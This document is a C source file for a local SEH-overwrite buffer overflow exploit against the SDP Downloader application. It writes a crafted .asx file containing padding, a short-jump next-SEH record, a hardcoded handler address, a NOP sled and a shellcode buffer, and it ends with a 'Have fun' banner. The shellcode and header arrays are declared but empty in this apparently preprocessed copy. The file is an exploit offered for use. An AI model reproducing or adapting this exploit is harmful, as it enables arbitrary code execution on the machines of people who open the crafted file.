
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 int EXIT_FAILURE ;
 int OFFSET ;
 int fclose (int *) ;
 int * fopen (char*,char*) ;
 int fprintf (int ,char*) ;
 int fputs (unsigned char*,int *) ;
 int* head1 ;
 int* head2 ;
 scalar_t__ malloc (int) ;
 int memcpy (unsigned char*,int*,int) ;
 int memset (unsigned char*,int,int) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int* scode ;
 int stdout ;
 int strlen (int*) ;

int main(int argc, char *argv[]){
    FILE *p;
    unsigned char *buffer;
    int n_seh=0x909010eb;
    int seh=0x7C87DE34;
    int i=0;
if(argc!=2){
          fprintf(stdout,"_______________________________________________________________________\n");
          fprintf(stdout,"\n\t\t SDP Downloader local Buffer overflow Exploit [seh]\n\n");
          printf("\tUSAGE : %s filename.asx\n",argv[0]);
          fprintf(stdout,"_________________________________________________________________________\n");
          }
if((p=fopen(argv[1],"w+b"))==((void*)0)){
                               perror("error");
                               return EXIT_FAILURE;
                                      }
buffer=(unsigned char*) malloc(strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2));
memset(buffer, 0x41, strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2));
memcpy(buffer,head1, strlen(head1));
i=OFFSET;
memcpy(buffer+strlen(head1)+i, &n_seh,4);
i+=4;
memcpy(buffer+strlen(head1)+i,&seh,4);
i+=4;
memset(buffer+strlen(head1)+i,0x90,10);
i+=10;
memcpy(buffer+strlen(head1)+i,scode,strlen(scode));
i+=strlen(scode);
memcpy(buffer+strlen(head1)+i,head2,strlen(head2));
i+=strlen(head2);

fputs(buffer,p);
fclose(p);
printf("%s has benn created !! \n Have fun \n DONE");
return 0x0;
}
